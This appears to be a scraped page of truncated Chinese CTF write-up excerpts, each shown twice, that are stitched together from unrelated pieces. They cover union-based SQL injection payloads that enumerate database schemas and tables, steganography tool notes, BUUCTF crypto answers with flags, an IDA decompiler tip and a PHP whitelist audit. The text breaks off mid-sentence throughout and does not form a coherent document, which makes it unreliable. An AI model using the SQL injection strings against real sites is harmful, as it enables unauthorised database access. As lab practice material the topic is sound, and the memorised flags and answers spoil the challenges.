文章目录WEB签到easyzphpezpyMISCbyteMuisc有趣的PDFWEB签到?id=-1'unionselect1,(selectgroup_concat(schema_name)frominformation_schema.schemata),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='SQL01'),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(column_

文章目录WEB签到easyzphpezpyMISCbyteMuisc有趣的PDFWEB签到?id=-1'unionselect1,(selectgroup_concat(schema_name)frominformation_schema.schemata),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='SQL01'),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(column_

MISC个人总结基本准备010editor分析——宽高 文件头尾文件属性中的详细信息——备注file查看文件类型ls-a查看所有文件多文件时 对比CRC值uuid格式UUID的标准格式，包含32个十六进制数，以连字号分为5段，形式为8-4-4-4-12的32个字符。UUID格式如下图所示。图片题-PNGLSB隐写StegsolveRGB 0通道 lsb低位cloacked-pixel隐写pythonlsb.pyextract-i"加密文件名"-oflag.txt-p密码strings查找可打印的字符串zstegzstegxxx.pngzstegxxx.png-a例：发现在b1,g,lsb,yx

MISC个人总结基本准备010editor分析——宽高 文件头尾文件属性中的详细信息——备注file查看文件类型ls-a查看所有文件多文件时 对比CRC值uuid格式UUID的标准格式，包含32个十六进制数，以连字号分为5段，形式为8-4-4-4-12的32个字符。UUID格式如下图所示。图片题-PNGLSB隐写StegsolveRGB 0通道 lsb低位cloacked-pixel隐写pythonlsb.pyextract-i"加密文件名"-oflag.txt-p密码strings查找可打印的字符串zstegzstegxxx.pngzstegxxx.png-a例：发现在b1,g,lsb,yx

BUUCTF—CRYPTO1—101、MD5题目：e00cf25ad42683b3df678c61f42c6bda解析：看题目就知道是MD5加密，直接上在线解码网站解码，答案是：flag{admin1}2、BASE64题目：ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30=解析：看题目就知道是BASE64加密，直接上在线解码网站解码，答案是：flag{THE_FLAG_OF_THIS_STRING}3、URL题目：%66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d解析：看题目就知道是URL编码，直接上在线解码网站解码，答案是：flag{

BUUCTF—CRYPTO1—101、MD5题目：e00cf25ad42683b3df678c61f42c6bda解析：看题目就知道是MD5加密，直接上在线解码网站解码，答案是：flag{admin1}2、BASE64题目：ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30=解析：看题目就知道是BASE64加密，直接上在线解码网站解码，答案是：flag{THE_FLAG_OF_THIS_STRING}3、URL题目：%66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d解析：看题目就知道是URL编码，直接上在线解码网站解码，答案是：flag{

查壳发现无壳。   IDA检查main函数显然先检查了输入是否以　　actf{　　开头进入sub_83A无法进入 点不进去是因为IDA限制了解析函数的长度，可以修改IDA下cfg目录的hexrays.cfg文件，如图没有改动前，1024应该是64，可以改成更大的数值。函数分析函数共计有3000行多，无法完全展示，这里节选部分。-------------------------省略-——---------------------不难发现，函数首先是进行了加密，然后是一个比较。我们注意到函数的加密很有规律：只使用了异或运算和自增运算符。这说明这个函数是可逆的，只要把结果反过来运算一遍就是flag。

查壳发现无壳。   IDA检查main函数显然先检查了输入是否以　　actf{　　开头进入sub_83A无法进入 点不进去是因为IDA限制了解析函数的长度，可以修改IDA下cfg目录的hexrays.cfg文件，如图没有改动前，1024应该是64，可以改成更大的数值。函数分析函数共计有3000行多，无法完全展示，这里节选部分。-------------------------省略-——---------------------不难发现，函数首先是进行了加密，然后是一个比较。我们注意到函数的加密很有规律：只使用了异或运算和自增运算符。这说明这个函数是可逆的，只要把结果反过来运算一遍就是flag。

前言刷题地址：https://buuoj.cn/challenges首先打开是一个笑脸，查看源代码，如下图发现了，一个文件一.代码分析发现是一堆代码，需要PHP代码审计，全部代码如下。1"source.php","hint"=>"hint.php"];8if(!isset($page)||!is_string($page)){9echo"youcan'tseeit";10returnfalse;11}1213if(in_array($page,$whitelist)){14returntrue;15}1617$_page=mb_substr(18$page,190,20mb_strpos($p

前言刷题地址：https://buuoj.cn/challenges首先打开是一个笑脸，查看源代码，如下图发现了，一个文件一.代码分析发现是一堆代码，需要PHP代码审计，全部代码如下。1"source.php","hint"=>"hint.php"];8if(!isset($page)||!is_string($page)){9echo"youcan'tseeit";10returnfalse;11}1213if(in_array($page,$whitelist)){14returntrue;15}1617$_page=mb_substr(18$page,190,20mb_strpos($p